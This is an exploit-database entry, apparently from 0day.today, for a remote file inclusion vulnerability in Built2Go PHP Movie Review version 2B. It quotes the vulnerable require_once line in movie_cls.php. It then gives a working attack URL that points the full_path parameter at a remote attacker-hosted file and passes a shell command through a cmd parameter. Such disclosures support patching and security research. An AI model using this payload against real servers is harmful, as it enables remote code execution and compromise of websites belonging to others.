id: 378
date: 04/22/2006
title: Built2Go PHP Movie Review <= 2B Remote File Inclusion Vulnerability
author: Camille Myers
cves: 

===================================================================
Built2Go PHP Movie Review <= 2B Remote File Inclusion Vulnerability
===================================================================




Built2Go PHP Movie Review <=2B Remote File Inclusion Vulnerability

in movie_cls.php

# require_once("$full_path/review_cls.php");

usage:

# http://www.site.com/[path]/movie_cls.php?full_path=http://www.site.com/x.txt?&cmd=uname -a



#  0day.today [2023-03-22]  #